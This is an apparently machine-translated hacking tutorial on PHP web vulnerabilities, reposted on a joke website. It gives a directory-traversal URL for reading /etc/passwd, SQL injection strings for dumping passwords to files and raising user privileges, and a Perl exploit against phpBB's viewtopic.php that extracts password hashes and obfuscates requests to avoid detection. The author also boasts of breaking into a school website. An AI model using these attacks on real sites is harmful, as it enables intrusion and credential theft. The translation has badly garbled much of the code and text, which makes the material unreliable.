Joke Collection Website - Cold jokes - Analysis of php page vulnerabilities and solutions to related problems

Analysis of php page vulnerabilities and solutions to related problems

From the current network security point of view, the most concerned and contacted web vulnerability should be ASP. In this respect, Zhu Xiao is an expert, and I have no right to speak. However, there are also serious security problems in PHP, but there are not many articles in this field. Here, I would like to discuss with you the related vulnerabilities of PHP pages.

I have made a summary of the common PHP vulnerabilities, which can be roughly divided into the following categories: including file vulnerabilities, script command execution vulnerabilities, file leakage vulnerabilities, SQL injection vulnerabilities and so on. Of course, as for some common techniques such as COOKIE spoofing, I won't discuss them here, and there are many such materials on the Internet. Then, let's analyze how to use these loopholes one by one!

First, let's discuss including file vulnerabilities. This vulnerability should be said to be unique to PHP. This is because the malicious data provided by the outside has not been completely processed, so that remote attackers can take advantage of these vulnerabilities and execute arbitrary commands on the system under the authority of the WEB process. Let's look at an example: suppose there is such a piece of code in a.php:

The following is a quote:

Include ($ include. "/XXX . PHP ");

In this code, $include is generally a set path, but we can achieve the purpose of attack by constructing a path ourselves. For example, we submit: a.php? Include =

Then, let's look at the script command execution vulnerability. This is because the URI parameters submitted by users are not adequately filtered. Submitting data containing malicious HTML code may lead to cross-site scripting attacks and may obtain sensitive information of the target users. Let's take an example: the index.php page in the PHP version below 4.3. 1 of PHP Transparent lacks sufficient filtering for PHPSESSID, and we can achieve the purpose of attack through such code.

Then, let's take a look at the file leak vulnerability, which is due to the lack of sufficient filtering for the parameters submitted by users, and remote attackers can use it to carry out directory traversal attacks and obtain some sensitive information. Let's take the recently discovered phpMyAdmin as an example. In phpMyAdmin, the "what" parameter submitted by the user is not fully filtered on the export.php page. Remote attackers can bypass the restriction of WEB ROOT by submitting data containing multiple "what" characters, and view any file information on the system with WEB permissions. For example, enter an address like this: export.php? What = ../../../../etc/passwd% 00 can achieve the purpose of file leakage. There are many in this field, such as: myPHPNuke, McNews and so on.

Finally, we have to go back to the most exciting place. Think about how cool it is to inject SQL into asp pages. We used to inject by hand until Zhu Xiao realized the secret of SQL injection (hehe) and created NBSI. Our NB alliance has really pulled out a sky. He has helped CSDN, Monopoly Forum, China Channel and other large websites find loopholes. Enough nonsense, it's a little beside the point.

Let's get down to business. In fact, SQL injection in asp is roughly the same as SQL injection in php, only pay attention to several functions used. Change asc to ASCII, len to LENGTH, and other functions are basically unchanged. In fact, when we saw the SQL injection of PHP, did everyone think of PHP-NUKE and PHPBB? Yes, as the saying goes, a forum like Dynamic Web should be the king of loopholes in asp. This is not to say that its forum security is too poor, but its reputation is too loud. The more people use it, the more people study it, and the more security holes are found. So is PHPBB. Nowadays, if a large number of people use PHP as a forum, they will generally choose PHPBB. Its loopholes have been emerging, from the earliest version of phpBB 1.4.0 to the latest version of phpBB 2.0.6 in groupcp.php, as well as the previously discovered search.php, profile.php, viewtopic.php, and so on, with about a dozen appearances. This has always led to the study of php vulnerabilities, some people will regard it as an experiment. The so-called practice makes perfect, I believe PHPBB will get better and better in the future.

Ok, let's analyze the cause of the leak. Taking viewtopic.php page as an example, because when calling viewtopic.php, the "topic_id" is directly obtained from the GET request and passed to the SQL query command, the attacker can submit a special SQL string to obtain the MD5 password without some filtering processing, and the obtained password information can be used for automatic login or brute force cracking. I don't think anyone wants to crack it violently unless there is a particularly important reason. Look at the relevant source code first:

The following is a quote:

#

if(isset($ HTTP _ GET _ VARS[POST _ TOPIC _ URL]))

#

{

#

$ TOPIC _ id = intval($ HTTP _ GET _ VARS[POST _ TOPIC _ URL]);

#

}

#

else if(isset($ HTTP _ GET _ VARS[' topic ']))

#

{

#

$ topic _ id = intval($ HTTP _ GET _ VARS[' topic ']);

#

}

From the above, we can see that if the submitted view=newest and sid are set to a value, the executed query code looks like this (if you haven't seen the PHPBB source code, I suggest you read it again, and the affected systems are: phpBB 2.0.5 and phpBB 2.0.4).

The following is a quote:

#

$sql = "select p.post_id

#

From ". Post _ Form. p,”。 Session _ table. s,”。 User _ table. u

#

Where s.session_id = '$session_id'

#

And u. user id = S. session user id.

#

And p.topic_id = $topic_id.

#

And p.post_time = u.user_lastvisit.

#

Sort by p.post_time ASC

#

Limit1";

Rick provided the following wrong test code:

Use io:: socket;

$ remote = shift | | ' localhost

$ view _ topic = shift | | '/phpbb 2/view topic . PHP ';

$ uid = shift | | 2;

$ port = 80

$ dBType = ' mysql4

# mysql4 or pgsql

Print "Attempt to obtain password hash of uid $uid server $ remote dbtype: $dBType";

$ p =

for($ index = 1; $ index = 32$index++)

{

$ Socket = IO::Socket::INET-new(peer addr = $ remote,

PeerPort = $port,

Proto = "tcp ",

Type = SOCK_STREAM)

Or die "failed to connect to $ remote: $ port: $ @";

$str = "GET $view_topic "。 "? sid= 1topic_id=- 1 "。 random_encode(make_dbsql())。 "View = Latest". ”HTTP/ 1.0”;

Print $ TERM $ socket $ str

Print $ socket "cookie: phpbb2mysql _ sid =1";

# Replace this with pgsql or delete it.

Print $ $ socket“Host:$ remote”; ";

while ($answer = $socket)

{

if ($answer =~ /location:。 *x23(d+)/) # Matching location: viewtopic.php? p=#

{

$ p . = chr();

}

}

$ TERM;

}

Print "MD5 hash $uid of uid is $ p";

# Randomly encode a string. Helps avoid being discovered.

Sub-random coding

{

$ str = shift

$ ret =

for($ I = 0; $i

{

$c = substr($str,$i, 1);

$j = rand length ($ str) *1000;

if (int($j) % 2 || $c eq ' ')

{

$ret。 = "%" .sprintf("%x ",ord($ c));

}

#p# Subtitle #e#

other

{

$ret。 = $ c;

}

}

Return to $ ret

}

sub make_dbsql

{

if ($dBType eq 'mysql4 ')

{

Return to "federated selection order (substring (user password),". $index。 ",1)) from phpbb_users where user _ id = $ uid/*;

} elsif ($dBType eq 'pgsql ')

{

Return "; Select ascii (substring (user _ password from $ index for1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false ";;

}

other

{

Return'';

}

}

I won't explain this code much. This function is used to get the hash value.

Seeing this, you may have some questions. Why don't I use the changed function I mentioned earlier? I'm not afraid of jokes when I speak: in fact, the query sentence on some pages of many online websites will be like this:

display.php? SQL save = select+*+from+AAA+where+xx = YY+order+by+bb b+ desc

Don't laugh, it's true. I have been to several big websites by this. As for which ones, it's hard to say, but that's how I got into the backstage of our school website. Use the previous function. Otherwise, you will have to change someone else's password! ! !

I almost forgot that when injecting sql, PHP and ASP are different, and mysql is not as flexible as MSsql in using SQL statements, so many query statements that can be used on mssql will not work on mysql. Generally, our common injection statement is this: aaa.php? Id=a' into outfile 'pass.txt or aaa.php? Id=a' enter the outfile 'pass.txt' /* can be further changed to: aaa.php? Id=a' or 1= 1 union select id, name, password forms users into export file' c:/a.txt.

This allows you to export database data to a file and then view it.

Or like this: mode=', user_level='4.

This statement is generally used to modify data, assuming that there are loopholes in the page, which can achieve the purpose of enhancing permissions.

Others, such as' or 1 = 1- or: 1' or 1=' 1, are similar to asp. I won't say much here. In php, SQL injection seems to be the first loophole, and there are too many pages with this problem.

In fact, there is only one reason why you look at the above classification: the submission parameters are not filtered or the filtering is not rigorous enough.

#p# Subtitle #e#